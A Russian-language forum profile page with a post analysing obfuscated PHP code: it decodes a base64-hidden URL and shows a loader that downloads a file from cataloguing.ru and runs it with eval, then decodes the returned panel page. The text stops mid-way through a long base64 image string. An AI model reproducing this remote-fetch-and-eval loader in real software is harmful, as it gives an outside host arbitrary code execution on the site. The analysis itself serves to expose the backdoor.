TaraZZZ

Members
  • Content count

    0
  • Joined

  • Last visited

About TaraZZZ

  • Rank
    Новичок

Profile Information

  • Специализация
    Вебмастер
  • Профиль ID
    https://id.pr-cy.ru/TaraZZZ
  1. Я не знаю что это за система вообще (не использовал никогда) но анализ кода был проведен не совсем коректно <?php // отключение отображения ошибок ini_set('display_errors', 'Off'); error_reporting('E_ALL'); $b = base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0'); // --> $b = 'http://cataloguing.ru/work.txt'; $q = $_GET['q']; if ($q) $b. = base64_decode('P3E9').$q; // if ($_GET['q']) $b .= '?q=' . $_GET['q']; получаем такую ссылку --> http://cataloguing.ru/work.txt?q=test'>http://cataloguing.ru/work.txt?q=test $d = file_get_contents($; // --> Загружаем файл по полученной ссылке выше ^ eval($d); // --> Выполняем загруженный файл как PHP ^ - здесь самая большая опасность, если администрация не добросовестная то тут может выполняться все что угодно Код выше не позволяет любому загружать шелл, только тем кто владеет cataloguing.ru, так как вы не знаете что будет выполнено после загрузки файла (http://cataloguing.ru/work.txt) что само по себе очень опасно. Копаем глубже. Загружаем файл http://cataloguing.ru/work.txt: header("Content-type: text/html; charset=UTF-8");echo base64_decode('PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KICAgIDx0aXRsZT7Qn9CQ0J3QldCb0Kwg0KPQn9Cg0JDQktCb0JXQndCY0K8g0J/QoNCe0JPQntCd0JDQnNCYPC90aXRsZT4NCiAgICA8bGluayBocmVmPSJodHRwOi8vY2F0YWxvZ3VpbmcucnUvY3NzL3BhbmVsLmNzcyIgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgbWVkaWE9InNjcmVlbiIgLz4NCiAgICA8bGluayBocmVmPSJodHRwOi8vY2F0YWxvZ3VpbmcucnUvaW1nL2Zhdmljb24uaWNvIiByZWw9InNob3J0Y3V0IGljb24iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz4NCiAgICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Y3JlYXRlUG9wdXAoKS5zaG93KCAwLCAwLCAwLCAwLCAwICk7PC9zY3JpcHQ+DQo8L2hlYWQ+DQo8Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2U7Ij4NCiAgICA8ZGl2IGlkPSJtYWluIj4NCiAgICAgICAgPGRpdiBpZD0ibmV3Ij48aDE+0J/QkNCd0JXQm9CsINCj0J/QoNCQ0JLQm9CV0J3QmNCvPC9oMT48YSBocmVmPSJodHRwOi8vY2F0YWxvZ3VpbmcucnUiPjxpbWcgc3JjPSJkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU5ZQUFBQVNDQVlBQUFBbm1pQ01BQUFBQkdkQlRVRUFBTEdQQy94aEJRQUFBQWx3U0ZsekFBQU93Z0FBRHNJQkZTaEtnQUFBQUJoMFJWaDBVMjltZEhkaGNtVUFjR0ZwYm5RdWJtVjBJRFF1TUM0empPYVhVQUFBRTlWSlJFRlVhRVBGVzJkYlZNbTI5c1A5QStlVC8yQSsraFBPbVhzY1o4N2tPVE9lR1IwRFprUUZsV0JBUVNVb0VzU0VvQWhJRGdaeXprbWlCRWtDa3FTQkpuV2dvWnZ1QnRaZHE5cTkzVVdYMmpEM3VYZWU1eDNvdGQ1YWUxVjRWMVh0eGkyV2xXVllXTmFBemppM2FSZ3RCakNZZENGR2k5NlQ0dW1NczNZY1I2SEZ0aFFELy91dlphdlJ1ckNzRmZJY3hhSlpENFpsWFFMKzNHZGRNUXM1amtMS1RhZlQvUTF6MDJEY2ovRHNiU0pRK3lYelFySEphdGhoWGNYY1RHS2VDT3VmSWVXbVg1NzV3bVJkNnNlNG5IK2pvRFZoc2hnNkRHYkR0bzNrSnVvNzVXYTJtbkNOYUxjYkxVdWxSc3ZpT2ovUC95d3dGNU5sU1cwd0dMWlNibnJUdkpqbkFDZzNIQzlZTU9sY2pHWkRCTTdyT3Y5NlB2OTVQYVMrYnFILzNhdjJobXRGaHplTjNPNTRKaXo5c3RhemQrcVZrTE1SVUhJa0xCdzhhMVRkVlNISFVhUzMzV2ZDMGhzMSs0Ym4rc0N2NklpUTV5aW1GMVJNV0ppYjVrbGpzSkJEb09kY0x6MHU5RW1JYXd6QzNQVEZPSFk3Sm5XakVGamlMT1Rab1ZCZ1E0ek92MEZoNmI5WU1odjZuN1pIQ2ptT0lxTDJNbzBiQ2t1emJYNVJEVGZMVGdsNWpxSnJzaEhYaUdFN0NyNjB1RGNkYllmc09JNGlwUHcwaWttRHdsSnZwZUowcThJZDdadVBWL00yRjVZc0N5NDRGeEhObytWQ3prYXdZTklBN2xobXVGTjFIbnp5bmNBMy93Q0R6MGFRZHdDeVg4Y3hZUzB1NjFGWXJXai9FR3N6OFRSTE5tRXRXMHpXQjdXK2FOOThiaW10ZDIwN2xsR1B3dXFGSy9rSC8xSnU2b1Z4MjQ1bE1XcGlHNExRTHM0dHJ0a2Y5REFJa2ZXWE9Mc01qUFg0NVhYY0diUnN4NXBBWVYwclBPSllidGhXWkJ2QndzRjJMTXRTZjNwYkJObzNPVzZJdTFVWEtUZTJZODB2cVNHdzJNV3gzRVRBM0Rvbkdtdzdsbm1wdExBM0ZlM0szSng0L21jUVZITHF2YkFNVzNITlFYRFo2VS9rOXBuWW1GdlZZQTRzV0hRdWk3aGpOWTJXb1gzejQwYnhhQWZkc3JxMkNyZkt2Y0E3ZSsrbThhTGpNUk9XWmNYaTJUUFpLdVJzQkpxbEdTYXNsZFVWNjcycXkwSU9JYlQ4RFBnVkhCSDZKQ1ExaHpOaG1WZk0rNFptZStGeXpuNGh6MUZNNmQ4eFlXRnVtc2YxMTRVY1FreWpIeFBXZzFwdm9aL3dxTTZmQ2N1NlptVTdsbS91UVNIUFVWRC9TRmlZVzM5cXkzMGg1MUxPUHR5TkxrSkdSemlrdFlkaEFRaGdpRzY0QWo2NVRqSXZ2UHdjVmw1dGgzbk52STNtdzYvZ0dCZG5vK2dZcjJmQ3d0eEtDN3BUaEJ5YW01clJkSGlycjRNYnhTZUVIRUpnb1FzZXUrYlZoalhEVmpwV0JoVzdDbm1Pb3FJL2t4MEZyYXZXaU1iaE1pRW5zT2c0eERjSHd2T3VleERmRW1nYnR5Wi9GUGxKT3k3bVpoTldjTWxaT1BkaTE2YnhyTzBSYUF3elRGaGRFODFDemtZd2E1aVNoUlZlZmw3SXVaWi9GTFJyL1ZBOW1pYjBTNGh2RElONXd3d1QxdHVaYmppZithZVE1eWhvWnhuVGpURmhSZFg0Q1RtRTZKZFhtTER1Vll2ekp6eW92a3BGaEFsclFqc0MzbG43aER4SE1ZajltOUhiaEpYVWROdk9Ud3UzWlRJWE5LdHZZSGpoSlV3dGQ3SWNDWlBMSGVDUDRwRzRvYVVlTUw4MHc0UTF2emlOb2ovRXhkb28ydDdWZ3RZd3k0U1YrenBCeUxtQWM5T2t5b0poUXdNRUZEb0xPUVNhKy9uRkdadXd6SXVZdDR1UTV5aksrcDVqWDJlWnNPcmZGdHY1WXh2OVljYmFqV1BVanVQV0FEb1lrTWN0dC9laEhSOXpzd25yZW9FYnVHZnN0RU5BZ1RQRU5QaEJjbXN3M0NnNkllUVEwbHNqWVVvM3pvVDFXdFVrNUZ4NHNRY2UxdmxDZW5zNEtqMFFCOE5aeUNPbzlTcFpXS0VsWG5iK3N3amZuSU9nWGUySHF1RlVPNzhTc2ZYQm9OYXBtTEFHcDd2QjQrbnZkcHpyMkxmRWxpQkliUXVEeU5wTDRQWHNEenVPaEhITmtDeXNpTXFyUWc0aEV1OG9OUEMzS3p5RmZzSzlDaC9xS3hPV1NqTUM1NTcvS2VSNVorNkYrOVVYSU9WVktFVFYrYkMraTNqOTZrNVE2VlZNV1BFdmI5bjVVN0g5L0VvdjdxS1gyT2NMbVh1Z2Q3NFN1dWZLOE5tN21ZM0dsbjRHRloyR21ZVUpXVmplbVU1eW5NMmdaYlFhMUZvVkUxWjJSN3lRNHloOHNnL0J0RjdGaExXRXdycWFjNHp6ZStMOFVSOHZaeDlndjlPNlMza1ZBbUZsWnptZWhPS2VwekN0VXpGaDFRNFdjYjV6ejNleG90TThrWVByWWhlenhUZGRCOTNhQUI2WHozTmNDVE1Ma3paaCtlZWVCTGVVZjNNbzZJdGhPd0pWdC9uVlBxYlMzSjZIZGp4Q2FsT0VMS3pPOFVZN2YzVDlWWml4ZExOWW80dk5iSExwOThUbW0zWmNnbG8vTGd2clpxRzduVCtoT1FnR2RMVnM0VkxWZmFPcFpndkU2K2t1TzI1MFRSRG05bzRKYTBEZEJhZFRmNU45N3VuL2dWZFQrYXh2RkdmYzJNcGlEbUZWdXZCOER4ZEh3cnY1dDdLdzdwYjVDRG1FaUNwdkZpdXM5S3pRVDdoZDZrMTlaY0lhMXd4alByL2JjV2hSVE9IRXNoek5uZXdualdWODQzWHN5NjhjOTgxVUI2aG1iTUtLcXd2bGZJU0c4VXhXY1Qwei9wQnRHVzNob0RhL3hzVjZrT01HNXAzQzNHekNtak5Ndy9tbi9IZ0U1RHV6TVE4cE9jM1pieGE3TWZ2MVFuNU5OUTlYeXNMS2JJdmpmSzRwdjhpLzM4QjJkeXE4N1BybXF2ajk0bk1uRXNKN1lSbmdjdVloam5zZTU0NFdmbkpyQ1BUTVZiRGZhUzNUejlLQmVJNUxLT3hLbDRWVjAxL0ErU2dmYWhkZGY0MTlwanpPcHUzRTlkc0grYjJQT2E2RTZZVUptN0N1WkRtRFMrS1BNcUpxZmRtaUlIRVI4V1RTenhCVjR3UFZJeGtjVDBKU3d6MFlueHRpd21vZmUybm5qM2taQUxFTkFlQ0dnMFdmYVFFTjZ1cFlKVGlSOUpNZGYxSTdKZ3NySU5mTnpoOVc2ZzRsQXdtc3d3UGFHdGJCSEJROWRYbzlONm9xRUZUekkweFliNlk2V1Y4azMrblVuVkE2bUFpQmVKU1FiSkUxdm13UzhqQ21aRk5pZEc0QXhzWnN3cnBWZkZISUlkeXBPTS9HOEdieGFhR2ZFRlo4SGxTYVVTYXNkL05ENEpiOEcrZS9rbk1ZWnZFSTBqRmRCTjR2OWpQYnhSZjdvSE9tQk9hc1BlQ1h4ODliNzJRYkNtdUlDU3U2K2libkl4VDN4MlB4ZUlVRmFMZHNxeGhLZ1hkTExTaTJYUnozV280THpRTVQxcXhCRGU1cHZKLzZSZjI3VzNtZXM5K3R2TURzd1NWbk9IdmpVRG1vdEtOTVdFOWJ4R05MYUZKbHc0U3BIVHhRL0NJL3dTdGpEMHhveDJSaFhYam14UG1wTGVVd3Y5SUg1VytUMkdlUDlEL2cxV1Erc3dVV25PRDQrYTlUYVkwd1lWVyt5ZU44dEZOVHJOUlh0K3hzSkZ3bFZ3SnVNaVNzRmJqODRnZ2NpL3RXQnFtY3FyZEwvSStjWFlTamlJVDYyL0lkcTIyc1hzaGJqOVRXTUphY0IwNllaS05ZQkZJOENjdTZZclg2NVp6azJrbndTUHVEN1hxbEE0bENQNEZpUGFqd3d6dlczSHRoZFlEemsrK0ZYQWt1OFQrd0hhRkpsWVBjNzJTN2xCc0pRRWM3MW9wVkUxcDBqbXVyUkhpWkordmY5WUpUUWovRkNpN3dwRGVnVEZoanVCT2VTUGlaNHhTOWljTmN1bkMzMk12WkwyY2VSTUgxUVBWd0d2c3M1ZFkzMmNIdVdEaHUvUStycm5OdENQNjV4OW5wbzExZGhEdmVEU3ljc1d5aFpYVkZvWi92cTIvbU1mbU9SWGZlMDhrN1pUL2hCdmFMK25lN3pJdXpoK05uc2djVnVyTFBVbTROS0N6YkhjdFNtdEh5aUd1alJPTjRGaFBXbVpTZHJOMTZQOW5jVTNmQjNNTDArN2VDQytDVnZvZmpVRnZLb1c3MEdSeC84b05zdjFub3h1d1BhNjZ3ejFKdXVSM0o3KzlZNW9pS3ZoeVpUNkQxMHE0dVpQUHdvak1DVDFuQmJGT1lNTGFCWi9xSHRVdVE4cDNEUXJURlpESEN4YWNINE5EanIyWFF3cW9mZThIWlBvVW50ZUdBbFNORWE1ejNmRFZhSytRUWZIREx2bDEyRG1McS9hRjI1Q25ySkMyYTlUd05YdjVJV0V2TEJ1dVZ6T04yZmdJTkhnbXJCS3V3eUMvaGZ0azFNQzBiRWpTTHMvdDZKOXZoU015LzdEaFVRSUlLWE9GQjFXVjQwbkNETFRhcWJpSXU3YWIwVmhCejA5ek05N0R6U3dncmRtZjlDOGh6RWZvSlFYbnVORzdGT3RQY2p0SFpBWENPKzU3ejB4R1hRSk9ydE5OaUdWdHNnZTdaTWpnYSt5SEgvcW5YN0hzc2cybWhQN0xDbjJ0RG9DSTBvSzJGTXZ4SmNWdXhqOUYxMXpER3QzYmNTODhPdzlMeVFvZkdvTmxHZDk1VENmL20vTlF2Nmw5WWlUdG5EeXZ4WVBiQXZCT2N2V21vQWt4VzAvWUZvN1kwclNtSzh5blI4QzRUaGRVR3Jvbjg4NVE0bmZRZjBKdTBhclZCdlpYZXdMbW43T0w4MUpaeXlHaTd3OWs5MDNjemUyTFRUYzZlMjU1TVh6aTc2STN6RWVXOVdaenZBcTVQT2gwVTlNUkErMVFoOU0xWDRacExSREh2NW5oSzZJMGFFdFlTbkV0ekFxZEgyeG1jY2RMbzRhWFllUC9EZjM0V1RvaTRtbHRndFZwRHRJdXpucTNEdFhJc0NiUXJVVUlraEg1TkRTN2FBbmlycTJmUDhVemJ6Y2REdm5acFRoYVd6N05qWEN5SmR3b0hqK0lWdlhuQ3RWZUNjcnRiY2dVc1ZvdE5XQk50Y0NCNkJ4ZVBLdmMwVnFOSnJKSmRNMlhRT3BIUGpvS3RFM2x3NE5GWGZEemswelpQd3NKS3FibVI2ODdGVW5LREM4K3cvbDNMZHVic0VpaTN3Snd6WUY1WlpzSWFtZTFISVg4cnh6b2M4dzA3b3IyZUxvV0RtTE95TGVVMXN0REl4RUhpWi9Hd0RkMGhsNWVYVVZpNi9vaFNQemtXNGREamI5aVlONDVuczhsWHhoUGhRc1pCRklMUkppeWRDc1g4RXhmUEQvdEYvYU4rS3RzRkY5bjY3WmR6WExZUnYzR29FbkJuM3E1SFlhVTBSSEt4bE8xZllrR24zWUNLbmRLdXhLbUVYMG4wTm1FdHphUFFmdWZpdWNUL3hISklhdzNuMnAxTlFVR2lQYjR4U0xZUlA2Y3RDVlpXVmx5MGkvTVJaZDFaWEt3b3ZCclFPdlBHZTUweTFzZEFiUXpMZXB1d1BGUDJ3dDdJTDJGZjVIOHpUT05sdHZGZE5yTTVncGlxVUZsWUxjTTF6Q2JGSXREaUdGdHN4Z0hZS2JkNVhHdjduc2M5OVEvWkprR0xneVVKNjlMVEk4d214Wkk0SitKL1poMHU3SXVUYlNMY0tmS1JoZFdqYW9QOVVmK1VZL20rT0F4YWpKSGQ5UkNjb3JiTGJVaG9MU2dzNGlwakVhYTBINFFWbUgyRzJkYm5SZ2dxc0IwN3JtUWQ1ZXhLQkdTNW9iRE1URmpETS8xdzhOSFhjaXlDYmNlcWdVUFIzM0R0anNaOGg2SnJaYnZxdnFnUHp4MlkraUNzZXlWWG1VMlpXM0p6S0NzYTArWXU5aEtqZDY0U21sQm9jUyt2NHpPK2x1TVF6cWM2WVJVM01XRlJNVGtXOHdPWEc0MGQ5UytzMklOcmQ3UEFkdmU2bG4yTXN6Y09Wc2pDU240WndXekszQ1RVano0SEZRckxPZllIenE3RWliaGZVRmlMc3JCYzQzL2pjcU8ybEVOcXl5MnVIYTAvc3RPcFJHblBmcFVvQzZ1MEs1UFpwRmh1aWIvQnFLR0p0YU9mZEF6c25DNkJramZ4ZU5KejR1TFkybjBKQnRON1lYa2s3NEUvSS80T2U5NkRxallkQnc5SC80dlpKZEJEbEo4bFBLNE1rWVhWUEZUTmJGS3NBdysvWWk4WnlnZVN1VFlwemJZNzF0bmszems3UVNtc2krbUhtRTJLSjNHT3gvMW8yN0ZRV0pKTmhQREN5d3BodllLOUQ3NlVZMFZXK3JBY3ZOTCtsUGtISCsxZ2ZXOVI1VEt1TWhaaFNtdjdncGlFRlpEcHhtenJjeVBjeUhkbHNYM3gvcXEwSytIMzRoU1lMWkt3M3FDNHY1SmpFZks2SDJNZisrQml4bjYrWGZaeDF2Y25LQWlsdlgveWc3RHVGbDlodGcveC9nR0pqU0hzaFZGc2ZTQThxcm1HN1cvZ1BTMkRIWDByMzZaeS9mVksyY2NKNjBqMGQ0cFlmMmZ6UmpsRVl4eXBEZUZ1K1VYVzd5dVpSemw3dzJDNUxLeWt1dnZNSnNWUzhpUmhVZkZRMnBVNEh2c1RKNnlUVDM3bGNxTzJsRU5LOHkydW5XdmlyOHhPaFVScHoycjlJS3lTMXkrWVRZcmxpcnZqc0w0QnFvYlM0VUhsWmR3US9DR3JNNUtkR09pSTZKbjZZZTFJN2V5RUpTSG8vYUtnUys2TlBGY0l5RG1CQy9nSmRNOVZjRHdKSW1FcE1haXRZNFBsZzFYdU5Jb3pzVEdZVlU1NmhxUENXZy9hVFdqUnRhanlZTStEZndnNUJKR3dKQjhkWnlpUHNvRWtkb2Z3elR3Q2JYaE1wVUt3RVdHSnNGbGhLZjFVeU9qMFFMdjlQVnl3M2xnaEgxVDVnQXJ2SUZRNUR6L21DNTlJV0JLb1d0TnJkUktUMGs1NE9aYkpGc3BSUElwS05wR3dsRzFPNE5HUTVyUlRYWXpGY3dlejBmelNXMGZxdHlQQ0VzRVJZVGtMaEtYMC8yOElpMERyaXE1RWxBOXRFTW8ybDU4ZllyRWUxbHpsN0lTUENvdHd2OXlidloyaHhnUlNiWERCR1RzZTRYUENvaTFUdWxNUjZDNXpwK3dDVzhBMDRldjVqZ2lMVUkxVmhPTFJwZklOM3VHT3hYNXZ4L21Vc0dqZ25yYmRZNVdYNGxEbHpuaDFod210K2Y5Q1dKa29MUGtvYUM4c3dzV24rOWw0MFZoUlBDb0VkU1BQY01mK3dZN2JyemdLcmhlV0I3MUp3d3BML1ZNV0loZmMrWWRSVkozcUVuYjBrZXlmRXhidGdObXZIN0tjM3VwZlFodk9BZTMwZEt5bWNmei9GaGFOVjFKVEtHYy9HZjhMK3g0d3BpNkFzMzlNV0RUL3RUaldwSU5qTWZ6YVNtaTh5WjV4TGVzWVp5ZDhVbGdTWExHU2s5SkZQZ2t4MWFHd3VyYjZVV0VSOXVLazBiYXFGQkxkS1pRY0NRc21uVVBDT294M2o2U21ZQ2dmVEdFTGhzNjQ2em0zOFk2MXVyb3FGSllFaWtOdmxvNDh0bFZzV21DMEk2N25FZDUvRmZCWllkRk8vTHo5UGxiMm40VitnbittSzZ5c3JueFNXQkxvaUVyaW9QdUR5RTk0TzkwRGEydHJRbUh0eHp0azVkczBKa3dTYWcwZUFlbEZodHJjaWNLb3h5UE5ibzd2bGJvZnJDdVdqd3FMUU9ORUJUSWZqNnhwcmJmQis5a0JOb2JwT0JmcjEwelRVQlhsOWxsaDBkdGlGZTU2MGx5SVFFZkJaWXZ4bzhJaTBOb1N6VFdONDNvN3ZiekEzT3lFUlFqTVBjbSsycUFqTkwyK3Avem9ia3JqU0VWWnlaVkFmNys0WldYVitrbGhPWUxZNmx0TVdOaFp6NWFQQ0dzam9MY3FKQ3pMaXZtVHduSUVkNHA4bWJDTVppTjdlU0VhN0kxZ2RvSDlIZVBmTUxkUENzc1IrR2U1WVc0cnhWYXJhY2ZJek1BbmhlVUlocWI3bUxBd056dGhFZlpnMzJrSGpjZkwrL1AyQ0Voc0NvSFFvclBDSW5LT0NjdmFZVGFidDAzcko0VEMyZ2hvWFpDd2NJZitwTEFvbC9YSHJ2V3dDY3ZFdnNlaTNVRWtySTBndHkyRkNjdHNYYllURnNFWlQwSjB2NktDUVdKNldIMVZlSVdSUUY5aGJRRllnMEYxRC9ST3RFUGZSTWVtUUJVTkV3dFpXMXZ4WERCcWdSYXdpT2NJZWhIMHBUVUphMjF0MVVxTDVhL2tSbitEaDdrbFlHNzdGcGNOMFBNWFlsRnVXTVdac0RBM3pjanNnREEzNHEyM2lUQTZOMGk1RlNOMjBHVDhsWDdTTXlrR3h2b0NjK3NmbngvK1MvR0dacGhJT3hEYjZKOFc5VTEyQ25tT2dIS2pVd2pHMm82NWxkTHJlejYzamVWSlIxNHNsbXFNdHhWM2ZQWlp4SE1FbE52YzRnemw1b0s1UmRBZjBQWk1mSHo5Zm54dWJYMGcvOXJhS3Z3UHd4MGhZLytpRDQ0QUFBQUFTVVZPUks1Q1lJST0iPjwvYT48L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibWVudSI+DQogICAgICAgICAgICA8YnV0dG9uIG9uY2xpY2s9ImdldF9kYXRhKCdjYXRhbG9nJykiPtCf0KDQntCT0J7QnSDQn9CeINCa0JDQotCQ0JvQntCT0JDQnDwvYnV0dG9uPg0KICAgICAgICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJnZXRfZGF0YSgnc3ByJykiPtCg0JXQk9CY0KHQotCg0JDQptCY0K8g0JIg0KHQn9Cg0JDQktCe0KfQndCY0JrQkNClPC9idXR0b24+DQogICAgICAgICAgICA8ZGl2IGlkPSJyZXMiPtCk0LDQudC7INGD0YHRgtCw0L3QvtCy0LvQtdC9INC60L7RgNGA0LXQutGC0L3QvjwvZGl2Pg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGlua3MiPjxhIGhyZWY9IiMiPtCi0KPQoiDQkdCj0JTQo9CiINCT0JXQndCV0KDQmNCg0J7QktCQ0KLQrNCh0K8g0J7QkdCg0JDQotCd0KvQlSDQodCh0KvQm9Ca0JgsINCV0KHQm9CYINCR0KPQlNCV0KIg0J3Qo9CW0J3QnjwvYT48L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cDovL2NhdGFsb2d1aW5nLnJ1L2pzL3BhbmVsLm1pbi5qcyI+PC9zY3JpcHQ+DQo8L2JvZHk+DQo8L2h0bWw+'); И что мы видим ? header("Content-type: text/html; charset=UTF-8"); // --> Устанавливаем кодировку выводимого текста echo .. // --> Выводит текст В результате получаем вот эту страницу: <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title> <link href="http://cataloguing.ru/css/panel.css'>http://cataloguing.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" /> <link href="http://cataloguing.ru/img/favicon.ico'>http://cataloguing.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <script type="text/javascript">createPopup().show( 0, 0, 0, 0, 0 );</script> </head> <body oncontextmenu="return false;"> <div id="main"> <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1><a href="http://cataloguing.ru"><img src="data:image/png;base64,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